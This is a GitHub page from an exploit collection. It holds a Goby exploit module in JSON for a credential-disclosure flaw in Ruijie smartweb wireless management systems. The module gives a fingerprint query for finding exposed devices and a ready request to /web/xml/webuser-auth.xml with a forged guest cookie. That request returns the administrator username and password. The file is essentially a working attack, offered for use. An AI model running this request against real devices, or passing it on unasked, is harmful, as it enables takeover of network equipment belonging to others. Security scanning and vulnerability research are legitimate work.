forked from k3vi-07/goby-exp
-
Notifications
You must be signed in to change notification settings - Fork 0
/
Ruijie_smartweb_password_information_disclosure.json
94 lines (94 loc) · 3.85 KB
/
Ruijie_smartweb_password_information_disclosure.json
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
{
"Name": "Ruijie smartweb password information disclosure",
"Level": "2",
"Tags": [
"Disclosure of Sensitive Information"
],
"GobyQuery": "app=\"Ruijie-WiFi\" && title=\"无线smartWeb--登录页面\"",
"Description": "The wireless smart web management system of Ruijie Network Co., Ltd. has a logical flaw. The attacker can obtain the administrator account and password from the vulnerability, and then log in with the administrator authority",
"Product": "Ruijie smartweb",
"Homepage": "http://www.ruijie.com.cn/",
"Author": "PeiQi",
"Impact": "<p>The attacker can obtain the password of the administrator account from the vulnerability, and then log in with the administrator authority.<br></p>",
"Recommandation": "<p>undefined</p>",
"References": [
"http://wiki.peiqi.tech"
],
"HasExp": true,
"ScanSteps": [
"AND",
{
"Request": {
"method": "GET",
"uri": "/web/xml/webuser-auth.xml",
"follow_redirect": false,
"header": {
"Cookie": "login=1; oid=1.3.6.1.4.1.4881.1.1.10.1.3; type=WS5302; auth=Z3Vlc3Q6Z3Vlc3Q%3D; user=guest"
},
"data_type": "text",
"data": ""
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "200",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "contains",
"value": "<![CDATA[ admin]]>",
"bz": ""
}
]
},
"SetVariable": []
}
],
"ExploitSteps": [
"AND",
{
"Request": {
"method": "GET",
"uri": "/web/xml/webuser-auth.xml",
"follow_redirect": false,
"header": {
"Cookie": "login=1; oid=1.3.6.1.4.1.4881.1.1.10.1.3; type=WS5302; auth=Z3Vlc3Q6Z3Vlc3Q%3D; user=guest"
},
"data_type": "text",
"data": ""
},
"ResponseTest": {
"type": "group",
"operation": "AND",
"checks": [
{
"type": "item",
"variable": "$code",
"operation": "==",
"value": "200",
"bz": ""
},
{
"type": "item",
"variable": "$body",
"operation": "contains",
"value": "<![CDATA[ admin]]>",
"bz": ""
}
]
},
"SetVariable": [
"output|lastbody"
]
}
],
"PostTime": "2021-04-04 12:41:15",
"GobyVersion": "1.8.255"
}